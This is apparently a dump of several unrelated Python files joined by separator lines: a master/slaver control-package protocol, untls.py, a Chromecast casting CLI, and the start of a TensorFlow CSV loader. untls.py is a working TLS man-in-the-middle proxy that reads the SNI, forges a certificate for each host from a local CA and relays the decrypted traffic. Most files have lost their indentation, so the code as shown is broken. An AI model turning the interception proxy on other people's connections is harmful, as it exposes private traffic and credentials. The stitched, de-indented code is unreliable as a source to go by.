    *2: package type: apart from heartbeat, every negative type is sent by the
        Slaver and every positive type by the Master
        -1: handshake response, Slaver-->Master  PTYPE_HS_S2M
         0: heartbeat package                    PTYPE_HEART_BEAT
        +1: handshake, Master-->Slaver           PTYPE_HS_M2S
    *3: defaults to INTERNAL_VERSION
    *4: the content of the data area is defined by each package type itself

    -------------- data area layout ------------------
    package type: -1 (handshake response, Slaver-->Master)
        size  name       data type      description
        4     crc32_s2m  unsigned int   simple auth: CRC32(Reversed(SECRET_KEY))
        1     ssl_flag   unsigned char  whether SSL is supported
        the rest is empty
        *note: the -1 handshake takes the CRC32 of the reversed SECRET_KEY string,
               while the +1 handshake does not reverse it first
    package type: 0 (heartbeat)
        data area is empty
    package type: +1 (handshake, Master-->Slaver)
        size  name       data type      description
        4     crc32_m2s  unsigned int   simple auth: CRC32(SECRET_KEY)
        1     ssl_flag   unsigned char  whether SSL is supported
        the rest is empty
"""
PACKAGE_SIZE = 2 ** 6 # 64 bytes
CTRL_PKG_TIMEOUT = 5 # CtrlPkg recv timeout, in second
# CRC32 for SECRET_KEY and Reversed(SECRET_KEY)
# these values are set by `set_secretkey`
SECRET_KEY_CRC32 = None # binascii.crc32(SECRET_KEY.encode('utf-8')) & 0xffffffff
SECRET_KEY_REVERSED_CRC32 = None # binascii.crc32(SECRET_KEY[::-1].encode('utf-8')) & 0xffffffff
# Package Type
PTYPE_HS_S2M = -1 # handshake pkg, slaver to master
PTYPE_HEART_BEAT = 0 # heart beat pkg
PTYPE_HS_M2S = +1 # handshake pkg, Master to Slaver
TYPE_NAME_MAP = {
PTYPE_HS_S2M: "PTYPE_HS_S2M",
PTYPE_HEART_BEAT: "PTYPE_HEART_BEAT",
PTYPE_HS_M2S: "PTYPE_HS_M2S",
}
# formats
# see https://docs.python.org/3/library/struct.html#format-characters
# for format syntax
FORMAT_PKG = b"!b b H 20x 40s"
FORMATS_DATA = {
PTYPE_HS_S2M: b"!I B 35x",
PTYPE_HEART_BEAT: b"!40x",
PTYPE_HS_M2S: b"!I B 35x",
}
SSL_FLAG_NONE = 0
SSL_FLAG_AVAIL = 1
def __init__(self, pkg_ver=0x01, pkg_type=0,
prgm_ver=INTERNAL_VERSION, data=(),
raw=None,
):
"""do not call this directly, use `CtrlPkg.pbuild_*` instead"""
self.pkg_ver = pkg_ver
self.pkg_type = pkg_type
self.prgm_ver = prgm_ver
self.data = data
if raw:
self.raw = raw
else:
self._build_bytes()
@property
def type_name(self):
"""返回人类可读的包类型"""
return self.TYPE_NAME_MAP.get(self.pkg_type, "TypeUnknown")
def __str__(self):
return """pkg_ver: {} pkg_type:{} prgm_ver:{} data:{}""".format(
self.pkg_ver,
self.type_name,
self.prgm_ver,
self.data,
)
def __repr__(self):
return self.__str__()
def _build_bytes(self):
self.raw = struct.pack(
self.FORMAT_PKG,
self.pkg_ver,
self.pkg_type,
self.prgm_ver,
self.data_encode(self.pkg_type, self.data),
)
@classmethod
def recalc_crc32(cls):
cls.SECRET_KEY_CRC32 = binascii.crc32(SECRET_KEY.encode('utf-8')) & 0xffffffff
cls.SECRET_KEY_REVERSED_CRC32 = binascii.crc32(SECRET_KEY[::-1].encode('utf-8')) & 0xffffffff
@classmethod
def data_decode(cls, ptype, data_raw):
return struct.unpack(cls.FORMATS_DATA[ptype], data_raw)
@classmethod
def data_encode(cls, ptype, data):
return struct.pack(cls.FORMATS_DATA[ptype], *data)
def verify(self, pkg_type=None):
try:
if pkg_type is not None and self.pkg_type != pkg_type:
return False
elif self.pkg_type == self.PTYPE_HS_S2M:
# Slaver-->Master 的握手响应包
return self.data[0] == self.SECRET_KEY_REVERSED_CRC32
elif self.pkg_type == self.PTYPE_HEART_BEAT:
# 心跳
return True
elif self.pkg_type == self.PTYPE_HS_M2S:
# Master-->Slaver 的握手包
return self.data[0] == self.SECRET_KEY_CRC32
else:
return True
except:
return False
@classmethod
def decode_only(cls, raw):
"""
decode raw bytes to CtrlPkg instance, no verify
use .decode_verify() if you also want verify
:param raw: raw bytes content of package
:type raw: bytes
:rtype: CtrlPkg
"""
if not raw or len(raw) != cls.PACKAGE_SIZE:
raise ValueError("content size should be {}, but {}".format(
cls.PACKAGE_SIZE, len(raw)
))
pkg_ver, pkg_type, prgm_ver, data_raw = struct.unpack(cls.FORMAT_PKG, raw)
data = cls.data_decode(pkg_type, data_raw)
return cls(
pkg_ver=pkg_ver, pkg_type=pkg_type,
prgm_ver=prgm_ver,
data=data,
raw=raw,
)
@classmethod
def decode_verify(cls, raw, pkg_type=None):
"""decode and verify a package
:param raw: raw bytes content of package
:type raw: bytes
:param pkg_type: assert this package's type,
if type not match, would be marked as wrong
:type pkg_type: int
:rtype: CtrlPkg, bool
:return: tuple(CtrlPkg, is_it_a_valid_package)
"""
try:
pkg = cls.decode_only(raw)
except:
log.error('unable to decode package. raw: %s', raw, exc_info=True)
return None, False
else:
return pkg, pkg.verify(pkg_type=pkg_type)
@classmethod
def pbuild_hs_m2s(cls, ssl_avail=False):
"""pkg build: Handshake Master to Slaver
"""
ssl_flag = cls.SSL_FLAG_AVAIL if ssl_avail else cls.SSL_FLAG_NONE
return cls(
pkg_type=cls.PTYPE_HS_M2S,
data=(cls.SECRET_KEY_CRC32, ssl_flag),
)
@classmethod
def pbuild_hs_s2m(cls, ssl_avail=False):
"""pkg build: Handshake Slaver to Master"""
ssl_flag = cls.SSL_FLAG_AVAIL if ssl_avail else cls.SSL_FLAG_NONE
return cls(
pkg_type=cls.PTYPE_HS_S2M,
data=(cls.SECRET_KEY_REVERSED_CRC32, ssl_flag),
)
@classmethod
def pbuild_heart_beat(cls):
"""pkg build: Heart Beat Package"""
return cls(
pkg_type=cls.PTYPE_HEART_BEAT,
)
@classmethod
def recv(cls, sock, timeout=CTRL_PKG_TIMEOUT, expect_ptype=None):
"""just a shortcut function
:param sock: which socket to recv CtrlPkg from
:type sock: socket.socket
:rtype: CtrlPkg,bool
"""
buff = select_recv(sock, cls.PACKAGE_SIZE, timeout)
pkg, verify = CtrlPkg.decode_verify(buff, pkg_type=expect_ptype) # type: CtrlPkg,bool
return pkg, verify
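

if __name__ == "__main__":
    # Minimal, self-contained usage sketch of the two main pieces above.
    # Everything here uses illustrative values (the secret key is a made-up example),
    # so it only exercises the local API, not a real master/slaver deployment.
    configure_logging(logging.INFO)

    # 1) CtrlPkg round-trip: build a heartbeat package and verify it against
    #    the 64-byte wire format described in the CtrlPkg docstring.
    set_secretkey("example-secret")
    hb = CtrlPkg.pbuild_heart_beat()
    assert len(hb.raw) == CtrlPkg.PACKAGE_SIZE
    pkg, ok = CtrlPkg.decode_verify(hb.raw, pkg_type=CtrlPkg.PTYPE_HEART_BEAT)
    log.info("decoded %s valid=%s", pkg, ok)

    # 2) SocketBridge: pipe two local socketpairs through the bridge.
    a1, a2 = socket.socketpair()
    b1, b2 = socket.socketpair()
    bridge = SocketBridge()
    bridge.start_as_daemon()
    bridge.add_conn_pair(a2, b1, callback=lambda: log.info("pair finished"))
    a1.sendall(b"hello through the bridge")
    log.info("received: %r", b2.recv(RECV_BUFFER_SIZE))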
|
untls.py
|
#!/usr/bin/env python3
import logging
import argparse
import socket, struct, random
import ssl, threading, socks, ctypes
from socksproxy import SocksProxy, ThreadingTCPServer, pipe_sockets, str2ipport, setprocname
from tempfile import TemporaryFile
from OpenSSL import crypto
from contextlib import contextmanager
from socketserver import ThreadingMixIn, TCPServer
def readfile(file):
with open(file,"rt") as f:
return f.read()
class Cert:
def __init__(self, cert, key):
self.ref = 1
self.cert = cert
self.key = key
with TemporaryFile(mode='w+b') as chain_file:
chain_file.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, key))
chain_file.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
chain_file.flush()
chain_fd_path = '/proc/self/fd/'+str(chain_file.fileno())
context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
            context.load_verify_locations(CA.ca_cert_path)
context.load_cert_chain(chain_fd_path)
self.context = context
class CertGen:
def __init__(self, ca_cert, ca_key):
self.certs = {}
self.ca_cert_path = ca_cert
self.ca_cert = crypto.load_certificate(crypto.FILETYPE_PEM, readfile(ca_cert))
self.ca_key = crypto.load_privatekey(crypto.FILETYPE_PEM, readfile(ca_key))
@contextmanager
def get(self, name):
try:
ex = self.certs.get(name)
if ex:
ex.ref += 1
yield ex
else:
key = crypto.PKey()
key.generate_key(crypto.TYPE_RSA, 2048)
cert = crypto.X509()
cert.set_version(2)
cert.set_serial_number(random.randint(50000000,100000000))
cert.get_subject().commonName = name
cert.add_extensions([
crypto.X509Extension(b"basicConstraints", False, b"CA:FALSE"),
crypto.X509Extension(b"subjectKeyIdentifier", False, b"hash", subject=cert),
])
cert.add_extensions([
crypto.X509Extension(b"authorityKeyIdentifier", False, b"keyid:always", issuer=self.ca_cert),
crypto.X509Extension(b"extendedKeyUsage", False, b"serverAuth"),
crypto.X509Extension(b"keyUsage", False, b"digitalSignature"),
])
cert.set_issuer(self.ca_cert.get_subject())
cert.set_pubkey(key)
cert.gmtime_adj_notBefore(-24*60*60)
cert.gmtime_adj_notAfter(7*24*60*60)
cert.sign(self.ca_key, 'sha256')
c = Cert(cert, key)
self.certs[name] = c
yield c
finally:
ex = self.certs[name]
ex.ref -= 1
# TODO: Add the below to a timer, and add an expiry date check
#if ex.ref <= 0:
# del self.certs[name]
def kill_thread(thread):
thread_id = thread.ident
res = ctypes.pythonapi.PyThreadState_SetAsyncExc(thread_id, ctypes.py_object(SystemExit))
if res > 1:
ctypes.pythonapi.PyThreadState_SetAsyncExc(thread_id, 0)
logging.error('Exception raise failure')
class TLSStripper(SocksProxy):
data = b''
def crecv(self, l):
assert len(self.data) + l < 1024 * 10 # Arbitrary limit, if we have to read more than 10K, something's probably off
res = self.connection.recv(l)
self.data += res
return res
def remote_connect(self):
self.sdirect = None
        logging.info(f'{self.id}: Connecting to remote {self.remote_address}:{self.remote_port}')
# Note: This is for non-mitm-ed / direct connections. We do this early, so we can refuse connections early too.
s = self.mksocket(args.via)
self.rconnect(s, args.via)
self.sdirect = s
def handle_socks(self):
logging.info(f'{self.id}: Socks5 connection established')
try:
# TLSPlaintext
ptype = ord(self.crecv(1))
assert ptype == 22 # TLSPlaintext::type == ContentType::handshake
struct.unpack("!H", self.crecv(2)) # TLSPlaintext::legacy_record_version. Per spec: field is deprecated and MUST be ignored for all purposes
plength, = struct.unpack("!H", self.crecv(2)) # TLSPlaintext::length. Only includes following bytes.
            assert plength <= 2**24 # Loose sanity bound; the spec caps TLSPlaintext length at 2^14 bytes.
assert plength >= 54 # Impossible to be shorter
# Handshake
htype = ord(self.crecv(1))
assert htype == 1 # Handshake::type == HandshakeType::client_hello
hlength, = struct.unpack("!I", b'\0' + self.crecv(3)) # Handshake::length, remaining bytes in message
assert hlength <= plength-4 # Handshake::type and Handshake::length are 4 bytes, so Handshake data must be at least 4 bytes smaller than fragment data
assert hlength >= 50 # Impossible to be shorter
# ClientHello
vversion, = struct.unpack("!H", self.crecv(2))
assert vversion == 0x0303 # ClientHello::version == TLS v1.2. Should also cover newer versions, since this field was deprecated for better backwards compat
self.crecv(32) # ClientHello::random
sid_len = ord(self.crecv(1))
assert sid_len <= 32
hlength -= 35 + sid_len + 2
assert hlength >= 13 # Impossible to be shorter
if sid_len:
self.crecv(sid_len)
vsciphersuite_len, = struct.unpack("!H", self.crecv(2))
hlength -= vsciphersuite_len + 1
assert hlength >= 12 # Impossible to be shorter
if vsciphersuite_len:
self.crecv(vsciphersuite_len)
vcompression_method_len = ord(self.crecv(1))
hlength -= vcompression_method_len + 2
assert hlength >= 10 # Impossible to be shorter
if vcompression_method_len:
self.crecv(vcompression_method_len)
# Extensions, this is what we're looking for
ext_len, = struct.unpack("!H", self.crecv(2))
assert hlength >= ext_len # Impossible to be shorter
sni=b''
while ext_len > 0:
ext_len -= 4
assert ext_len >= 0
etype, elength = struct.unpack("!HH", self.crecv(4))
ext_len -= elength
assert ext_len >= 0 # Impossible to be shorter
buf = self.crecv(elength)
off = 0
if etype == 0: # Extension::type == ExtensionType::server_name
sllen, = struct.unpack("!H", buf[off:off+2])
off += 2
while sllen > 0:
stype = ord(buf[off:off+1])
off += 1
slen, = struct.unpack("!H", buf[off:off+2])
off += 2
if slen == 0:
continue
name = buf[off:off+slen]
off += slen
if stype == 0: # ServerName::name_type, 0 = host_name
sni = name
break
name = None
break
assert sni
sni = sni.decode()
except:
logging.info(f'{self.id}: Couldn\'t extract SNI, assuming plain connection')
pipe_sockets(self.sdirect, self.connection, self.data, logprefix=f'{self.id}: client <=> remote: ')
self.data = None
return
logging.info(f'{self.id}: Got SNI: {sni}')
self.sdirect.close()
# Create certificate
with CA.get(sni) as crt:
sa, sb = socket.socketpair()
try:
t1 = threading.Thread(target=pipe_sockets, args=(sa, self.connection, self.data, None, f'{self.id}: client <=> mitm ssl in: '))
self.data = None
t1.daemon = True
t1.start()
with crt.context.wrap_socket(sb, server_side=True) as ssock:
s = self.mksocket(args.tls_via)
self.rconnect(s, args.via, sni)
pipe_sockets(s, ssock, logprefix=f'{self.id}: mitm decrypted out <=> remote: ')
finally:
sb.close()
if t1:
kill_thread(t1)
sa.close()
def cleanup(self):
if self.sdirect:
self.sdirect.close()
if __name__ == '__main__':
logging.root.setLevel(logging.NOTSET)
setprocname(__file__)
parser = argparse.ArgumentParser(description='socks plain to tls proxy', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-l', '--listen', type=str2ipport('0.0.0.0',1666, False), help='IP:PORT to listen on', default='0.0.0.0:1666')
parser.add_argument('-c', '--via', type=str2ipport(), help='IP:PORT of socks proxy to connect to for undecryptable traffic, or "direct" for none', default='127.0.0.1:2666')
parser.add_argument('-t', '--tls-via', type=str2ipport(), help='IP:PORT of socks proxy to connect to for decrypted traffic', default='127.0.0.1:3666')
parser.add_argument('--ca', default="/etc/ssl/CA/CA.pem")
parser.add_argument('--ca-key', default="/etc/ssl/CA/CA.key")
args = parser.parse_args()
CA = CertGen(args.ca, args.ca_key)
with ThreadingTCPServer(args.listen, TLSStripper) as server:
server.serve_forever()
|
cli.py
|
# -*- coding: utf-8 -*-
import configparser
import random
import sys
import time
from pathlib import Path
from threading import Thread
from urllib.parse import urlparse
import click
from . import __codename__
from . import __version__
from .controllers import CastState
from .controllers import setup_cast
from .controllers import StateFileError
from .controllers import StateMode
from .discovery import cast_device_ip_exists
from .discovery import get_cast_devices_info
from .error import CastError
from .error import CattUserError
from .error import CliError
from .http_server import serve_file
from .subs_info import SubsInfo
from .util import echo_json
from .util import echo_status
from .util import echo_warning
from .util import hunt_subtitles
from .util import is_ipaddress
CONFIG_DIR = Path(click.get_app_dir("catt"))
CONFIG_PATH = Path(CONFIG_DIR, "catt.cfg")
STATE_PATH = Path(CONFIG_DIR, "state.json")
WAIT_PLAY_TIMEOUT = 30
class CattTimeParamType(click.ParamType):
def convert(self, value, param, ctx):
try:
tdesc = [int(x) for x in value.split(":")]
tlen = len(tdesc)
if (tlen > 1 and any(t > 59 for t in tdesc)) or tlen > 3:
raise ValueError
except ValueError:
self.fail("{} is not a valid time description.".format(value))
tdesc.reverse()
return sum(tdesc[p] * 60 ** p for p in range(tlen))
CATT_TIME = CattTimeParamType()
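# For example (illustrative values): CATT_TIME converts "SS", "MM:SS" or "HH:MM:SS"
# strings to seconds, so "1:02:03" -> 3 + 2 * 60 + 1 * 3600 = 3723.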
class YtdlOptParamType(click.ParamType):
def convert(self, value, param, ctx):
if "=" not in value:
self.fail("{} is not a valid key/value pair.".format(value))
ykey, yval = value.split("=", 1)
yval = {"true": True, "false": False}.get(yval.lower().strip(), yval)
return (ykey, yval)
YTDL_OPT = YtdlOptParamType()
def process_url(ctx, param, value: str):
if value == "-":
stdin_text = click.get_text_stream("stdin")
if not stdin_text.isatty():
value = stdin_text.read().strip()
else:
raise CliError("No input received from stdin")
if "://" not in value:
if ctx.info_name != "cast":
raise CliError("Local file not allowed as argument to this command")
if not Path(value).is_file():
raise CliError("The chosen file does not exist")
return value
def process_path(ctx, param, value):
path = Path(value) if value else None
if path and (path.is_dir() or not path.parent.exists()):
raise CliError("The specified path is invalid")
return path
def process_subtitles(ctx, param, value):
if not value:
return None
pval = urlparse(value).path if "://" in value else value
if not pval.lower().endswith((".srt", ".vtt")):
raise CliError("Invalid subtitles format, only srt and vtt are supported")
if "://" not in value and not Path(value).is_file():
raise CliError("Subtitles file [{}] does not exist".format(value))
return value
def process_device(device_desc, aliases):
"""
Resolve real device name when value is an alias.
:param device_desc: Can be an ip-address or a name (alias or real name).
:type device_desc: str
:param aliases: Dictionary of device aliases and their corresponding real names.
:type aliases: Dict[str, str]
"""
if is_ipaddress(device_desc):
return device_desc
else:
if device_desc:
device_desc = device_desc.lower()
return aliases.get(device_desc, device_desc)
def fail_if_no_ip(ipaddr):
if not ipaddr:
raise CliError("Local IP-address could not be determined")
def create_server_thread(filename, address, port, content_type, single_req=False):
thr = Thread(target=serve_file, args=(filename, address, port, content_type, single_req))
    thr.daemon = True
thr.start()
return thr
CONTEXT_SETTINGS = dict(help_option_names=["-h", "--help"])
@click.group(context_settings=CONTEXT_SETTINGS)
@click.option("-d", "--device", metavar="NAME_OR_IP", help="Select Chromecast device.")
@click.version_option(
version=__version__,
prog_name="catt",
message="%(prog)s v%(version)s, " + __codename__ + ".",
)
@click.pass_context
def cli(ctx, device):
device_from_config = ctx.obj["options"].get("device")
ctx.obj["selected_device"] = process_device(device or device_from_config, ctx.obj["aliases"])
ctx.obj["selected_device_is_from_cli"] = bool(device)
@cli.command(short_help="Send a video to a Chromecast for playing.")
@click.argument("video_url", callback=process_url)
@click.option(
"-s",
"--subtitles",
callback=process_subtitles,
metavar="SUB",
help="Specify a subtitles file.",
)
@click.option(
"-f",
"--force-default",
is_flag=True,
help="Force use of the default Chromecast app (use if a custom app doesn't work).",
)
@click.option(
"-r",
"--random-play",
is_flag=True,
help="Play random item from playlist, if applicable.",
)
@click.option(
"--no-subs",
is_flag=True,
default=False,
help="Don't try to load subtitles automatically from the local folder.",
)
@click.option(
"-n",
"--no-playlist",
is_flag=True,
help="Play only video, if url contains both video and playlist ids.",
)
@click.option(
"-y",
"--ytdl-option",
type=YTDL_OPT,
multiple=True,
metavar="OPT",
help="yt-dlp option. "
"Should be passed as `-y option=value`, and can be specified multiple times (implies --force-default).",
)
@click.option(
"-t",
"--seek-to",
type=CATT_TIME,
metavar="TIME",
help="Start playback at specific timestamp.",
)
@click.option(
"-b",
"--block",
is_flag=True,
help="Keep catt process alive until playback has ended. "
"Only useful when casting remote files, as catt is already running a server when casting local files. "
"Currently exits after playback of single media, so not useful with playlists yet.",
)
@click.pass_obj
def cast(
settings,
video_url: str,
subtitles,
force_default: bool,
random_play: bool,
no_subs: bool,
no_playlist: bool,
ytdl_option,
seek_to: str,
block: bool = False,
):
controller = "default" if force_default or ytdl_option else None
playlist_playback = False
st_thr = su_thr = subs = None
cst, stream = setup_cast(
settings["selected_device"],
video_url=video_url,
prep="app",
controller=controller,
ytdl_options=ytdl_option,
)
media_is_image = stream.guessed_content_category == "image"
local_or_remote = "local" if stream.is_local_file else "remote"
if stream.is_local_file:
fail_if_no_ip(stream.local_ip)
st_thr = create_server_thread(
video_url,
stream.local_ip,
stream.port,
stream.guessed_content_type,
single_req=media_is_image,
)
elif stream.is_playlist and not (no_playlist and stream.video_id):
if stream.playlist_length == 0:
cst.kill(idle_only=True)
raise CliError("Playlist is empty")
if not random_play and cst.playlist_capability and stream.playlist_all_ids:
playlist_playback = True
else:
if random_play:
entry = random.randrange(0, stream.playlist_length)
else:
echo_warning("Playlist playback not possible, playing first video")
entry = 0
stream.set_playlist_entry(entry)
if playlist_playback:
click.echo("Casting remote playlist {}...".format(video_url))
video_id = stream.video_id or stream.playlist_all_ids[0]
cst.play_playlist(stream.playlist_id, video_id=video_id)
else:
if not subtitles and not no_subs and stream.is_local_file:
subtitles = hunt_subtitles(video_url)
if subtitles:
fail_if_no_ip(stream.local_ip)
subs = SubsInfo(subtitles, stream.local_ip, stream.port + 1)
su_thr = create_server_thread(
subs.file,
subs.local_ip,
subs.port,
"text/vtt;charset=utf-8",
single_req=True,
)
click.echo("Casting {} file {}...".format(local_or_remote, video_url))
click.echo(
'{} "{}" on "{}"...'.format(
"Showing" if media_is_image else "Playing",
stream.video_title,
cst.cc_name,
)
)
if cst.info_type == "url":
cst.play_media_url(
stream.video_url,
title=stream.video_title,
content_type=stream.guessed_content_type,
subtitles=subs.url if subs else None,
thumb=stream.video_thumbnail,
current_time=seek_to,
)
elif cst.info_type == "id":
cst.play_media_id(stream.video_id, current_time=seek_to)
else:
raise ValueError("Invalid or undefined info type")
if stream.is_local_file or subs:
click.echo("Serving local file(s).")
if not media_is_image and (stream.is_local_file or block):
if not cst.wait_for(["PLAYING"], timeout=WAIT_PLAY_TIMEOUT):
raise CliError("Playback of {} file has failed".format(local_or_remote))
cst.wait_for(["UNKNOWN", "IDLE"])
elif (stream.is_local_file and media_is_image) or subs:
while (st_thr and st_thr.is_alive()) or (su_thr and su_thr.is_alive()):
time.sleep(1)
@cli.command("cast_site", short_help="Cast any website to a Chromecast.")
@click.argument("url", callback=process_url)
@click.pass_obj
def cast_site(settings, url):
cst = setup_cast(
settings["selected_device"],
controller="dashcast",
action="load_url",
prep="app",
)
click.echo('Casting {} on "{}"...'.format(url, cst.cc_name))
cst.load_url(url)
@cli.command(short_help="Add a video to the queue (YouTube only).")
@click.argument("video_url", callback=process_url)
@click.option(
"-n",
"--play-next",
is_flag=True,
help="Add video immediately after currently playing video.",
)
@click.pass_obj
def add(settings, video_url, play_next):
cst, stream = setup_cast(settings["selected_device"], video_url=video_url, action="add", prep="control")
if cst.name != stream.extractor or not (stream.is_remote_file or stream.is_playlist_with_active_entry):
raise CliError("This url cannot be added to the queue")
click.echo('Adding video id "{}" to the queue.'.format(stream.video_id))
if play_next:
cst.add_next(stream.video_id)
else:
cst.add(stream.video_id)
@cli.command(short_help="Remove a video from the queue (YouTube only).")
@click.argument("video_url", callback=process_url)
@click.pass_obj
def remove(settings, video_url):
cst, stream = setup_cast(
settings["selected_device"],
video_url=video_url,
action="remove",
prep="control",
)
if cst.name != stream.extractor or not stream.is_remote_file:
raise CliError("This url cannot be removed from the queue")
click.echo('Removing video id "{}" from the queue.'.format(stream.video_id))
cst.remove(stream.video_id)
@cli.command(short_help="Clear the queue (YouTube only).")
@click.pass_obj
def clear(settings):
cst = setup_cast(settings["selected_device"], action="clear", prep="control")
cst.clear()
@cli.command(short_help="Pause a video.")
@click.pass_obj
def pause(settings):
cst = setup_cast(settings["selected_device"], action="pause", prep="control")
cst.pause()
@cli.command(short_help="Resume a video after it has been paused.")
@click.pass_obj
def play(settings):
cst = setup_cast(settings["selected_device"], action="play", prep="control")
cst.play()
@cli.command("play_toggle", short_help="Toggle between playing and paused state.")
@click.pass_obj
def play_toggle(settings):
cst = setup_cast(settings["selected_device"], action="play_toggle", prep="control")
cst.play_toggle()
@cli.command(short_help="Stop playing.")
@click.option(
"-f",
"--force",
is_flag=True,
help="Launch dummy chromecast app before sending stop command "
"(for devices that do not respond to stop command under certain circumstances).",
)
@click.pass_obj
def stop(settings, force):
cst = setup_cast(settings["selected_device"])
cst.kill(force=force)
@cli.command(short_help="Rewind a video by TIME duration.")
@click.argument("timedesc", type=CATT_TIME, required=False, default="30", metavar="TIME")
@click.pass_obj
def rewind(settings, timedesc):
cst = setup_cast(settings["selected_device"], action="rewind", prep="control")
cst.rewind(timedesc)
@cli.command(short_help="Fastforward a video by TIME duration.")
@click.argument("timedesc", type=CATT_TIME, required=False, default="30", metavar="TIME")
@click.pass_obj
def ffwd(settings, timedesc):
cst = setup_cast(settings["selected_device"], action="ffwd", prep="control")
cst.ffwd(timedesc)
@cli.command(short_help="Seek the video to TIME position.")
@click.argument("timedesc", type=CATT_TIME, metavar="TIME")
@click.pass_obj
def seek(settings, timedesc):
cst = setup_cast(settings["selected_device"], action="seek", prep="control")
cst.seek(timedesc)
@cli.command(short_help="Skip to end of content.")
@click.pass_obj
def skip(settings):
cst = setup_cast(settings["selected_device"], action="skip", prep="control")
cst.skip()
@cli.command(short_help="Set the volume to LVL [0-100].")
@click.argument("level", type=click.IntRange(0, 100), metavar="LVL")
@click.pass_obj
def volume(settings, level):
cst = setup_cast(settings["selected_device"])
cst.volume(level / 100.0)
@cli.command(short_help="Turn up volume by a DELTA increment.")
@click.argument("delta", type=click.IntRange(1, 100), required=False, default=10, metavar="DELTA")
@click.pass_obj
def volumeup(settings, delta):
cst = setup_cast(settings["selected_device"])
cst.volumeup(delta / 100.0)
@cli.command(short_help="Turn down volume by a DELTA increment.")
@click.argument("delta", type=click.IntRange(1, 100), required=False, default=10, metavar="DELTA")
@click.pass_obj
def volumedown(settings, delta):
cst = setup_cast(settings["selected_device"])
cst.volumedown(delta / 100.0)
@cli.command(short_help="Show some information about the currently-playing video.")
@click.pass_obj
def status(settings):
cst = setup_cast(settings["selected_device"], prep="info")
echo_status(cst.cast_info)
@cli.command(short_help="Show complete information about the currently-playing video.")
@click.option("-j", "--json-output", is_flag=True, help="Output info as json.")
@click.pass_obj
def info(settings, json_output):
try:
cst = setup_cast(settings["selected_device"], prep="info")
except CastError:
if json_output:
info = {}
else:
raise
else:
info = cst.info
if json_output:
echo_json(info)
else:
for (key, value) in info.items():
click.echo("{}: {}".format(key, value))
@cli.command(short_help="Scan the local network and show all Chromecasts and their IPs.")
@click.option("-j", "--json-output", is_flag=True, help="Output scan result as json.")
def scan(json_output):
if not json_output:
click.echo("Scanning Chromecasts...")
devices = get_cast_devices_info()
if json_output:
echo_json(devices)
else:
if not devices:
raise CastError("No devices found")
for device in devices.keys():
click.echo("{ip} - {device} - {manufacturer} {model_name}".format(device=device, **devices[device]))
@cli.command(short_help="Save the current state of the Chromecast for later use.")
@click.argument("path", type=click.Path(writable=True), callback=process_path, required=False)
@click.pass_obj
def save(settings, path):
cst = setup_cast(settings["selected_device"], prep="control")
if not cst.save_capability or cst.is_streaming_local_file:
raise CliError("Saving state of this kind of content is not supported")
elif cst.save_capability == "partial":
echo_warning("Please be advised that playlist data will not be saved")
echo_status(cst.media_info)
if path and path.is_file():
click.confirm("File already exists. Overwrite?", abort=True)
click.echo("Saving...")
if path:
state = CastState(path, StateMode.ARBI)
cc_name = "*"
else:
state = CastState(STATE_PATH, StateMode.CONF)
cc_name = cst.cc_name
state.set_data(cc_name, {"controller": cst.name, "data": cst.media_info})
@cli.command(short_help="Return Chromecast to saved state.")
@click.argument("path", type=click.Path(exists=True), callback=process_path, required=False)
@click.pass_obj
def restore(settings, path):
if not path and not STATE_PATH.is_file():
raise CliError("Save file in config dir has not been created")
cst = setup_cast(settings["selected_device"])
state = CastState(path or STATE_PATH, StateMode.READ)
try:
data = state.get_data(cst.cc_name if not path else None)
except StateFileError:
raise CliError("The chosen file is not a valid save file")
if not data:
raise CliError("No save data found for this device")
echo_status(data["data"])
click.echo("Restoring...")
cst = setup_cast(settings["selected_device"], prep="app", controller=data["controller"])
cst.restore(data["data"])
@cli.command("write_config", short_help='DEPRECATED: Please use "set_default".')
def write_config():
raise CliError('DEPRECATED: Please use "set_default"')
@cli.command("set_default", short_help="Set the selected device as default.")
@click.pass_obj
def set_default(settings):
config = readconfig()
device = get_device_from_settings(settings)
config["options"]["device"] = device
writeconfig(config)
@cli.command("del_default", short_help="Delete the default device.")
@click.pass_obj
def del_default(settings):
config = readconfig()
if "device" not in config["options"]:
raise CliError("No default device is set, so none deleted")
config["options"].pop("device")
writeconfig(config)
@cli.command(
"set_alias",
short_help="Set an alias name for the selected device (case-insensitive).",
)
@click.argument("name")
@click.pass_obj
def set_alias(settings, name):
config = readconfig()
device = get_device_from_settings(settings)
old_alias = get_alias_from_config(config, device)
if old_alias:
config["aliases"].pop(old_alias)
config["aliases"][name] = device
writeconfig(config)
@cli.command("del_alias", short_help="Delete the alias name of the selected device.")
@click.pass_obj
def del_alias(settings):
config = readconfig()
device = get_device_from_settings(settings)
alias = get_alias_from_config(config, device)
if not alias:
raise CliError('No alias exists for "{}", so none deleted'.format(device))
config["aliases"].pop(alias)
writeconfig(config)
def get_alias_from_config(config, device):
try:
return next(a for a, d in config["aliases"].items() if d == device)
except StopIteration:
return None
def get_device_from_settings(settings):
device_desc = settings["selected_device"]
if not device_desc or not settings["selected_device_is_from_cli"]:
raise CliError("No device specified (must be explicitly specified with -d option)")
is_ip = is_ipaddress(device_desc)
if is_ip:
found = cast_device_ip_exists(device_desc)
else:
devices = get_cast_devices_info()
found = device_desc in devices.keys()
if not found:
msg = "No device found at {}" if is_ip else 'Specified device "{}" not found'
raise CliError(msg.format(device_desc))
return device_desc
def writeconfig(config):
try:
CONFIG_DIR.mkdir(parents=True)
except FileExistsError:
pass
with CONFIG_PATH.open("w") as configfile:
config.write(configfile)
def readconfig():
config = configparser.ConfigParser()
# ConfigParser.read does not take path-like objects <3.6.
config.read(str(CONFIG_PATH))
for req_section in ("options", "aliases"):
if req_section not in config.sections():
config.add_section(req_section)
return config
def get_config_as_dict():
"""
Returns a dictionary of the form:
{"options": {"key": "value"},
"aliases": {"device1": "device_name"}}
"""
config = readconfig()
return {section: dict(config.items(section)) for section in config.sections()}
def main():
try:
return cli(obj=get_config_as_dict())
except CattUserError as err:
sys.exit("Error: {}.".format(str(err)))
if __name__ == "__main__":
main()
|
CustomRunner.py
|
import tensorflow as tf
import time
import threading
import numpy as np
from tqdm import tqdm
import random
# load data entirely into memory 🙁
name_list = list()
print("Populating name_list")
for i in tqdm(range(25000)):
name_list.append("/home/david/Documents/gameFiles/CSV-19x19/data"+str(i)+".csv")
filename_queue = tf.train.string_input_producer(name_list, shuffle=True)
reader = tf.TextLineReader()
